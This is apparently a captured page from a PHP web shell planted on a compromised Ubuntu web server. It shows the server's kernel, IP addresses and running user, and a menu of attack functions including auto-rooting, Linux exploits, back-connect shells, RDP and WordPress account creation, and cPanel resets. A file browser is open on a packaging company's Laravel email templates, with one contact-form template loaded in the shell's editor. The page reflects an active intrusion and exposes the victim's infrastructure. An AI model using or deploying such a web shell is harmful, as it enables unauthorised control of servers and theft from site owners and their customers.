Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.75
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
emails /
[ HOME SHELL ]
Name
Size
Permission
Action
beat_my_quote.blade.php
4.15
KB
-rw-r--r--
contact_us.blade.php
1.38
KB
-rw-r--r--
contact_us_au.blade.php
985
B
-rw-r--r--
get_quote.blade.php
4.17
KB
-rw-r--r--
get_quote_au.blade.php
2.21
KB
-rw-r--r--
subscribe.blade.php
2.74
KB
-rw-r--r--
thank_you.blade.php
1.45
KB
-rw-r--r--
thank_you_au.blade.php
1.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact_us_au.blade.php
<html><body style="width: 100%" > <table rules="all" style="border-color: #666; width: 100%" cellpadding="10"> <tr style='background: #eee;'><td colspan='2'><img src='{{ asset('assets/images/logo.png') }}' alt=''/></td> <tr style='background: #eee;'><td colspan='2'>A new user has been contact to OXO Packaging with following:</td> <tr><td><strong>Name:</strong> </td><td>{{$name}}</td></tr> <tr><td><strong>Email:</strong> </td><td>{{$email}}</td></tr> <tr><td><strong>Location:</strong> </td><td>{{$location}}</td></tr> <tr><td><strong>Phone:</strong> </td><td>{{$phone}}</td></tr> <tr><td><strong>Company:</strong> </td><td>{{$company}}</td></tr> <tr><td><strong>Site:</strong> </td><td>{{$site}}</td></tr> <tr><td><strong>Requirements/Message:</strong> </td><td>{{$requirements_message}}</td></tr> <tr style='background: #eee;'><td colspan='2'> Support<br> www.oxopackaging.com.au </td> </tr> </table> </body></html>
Close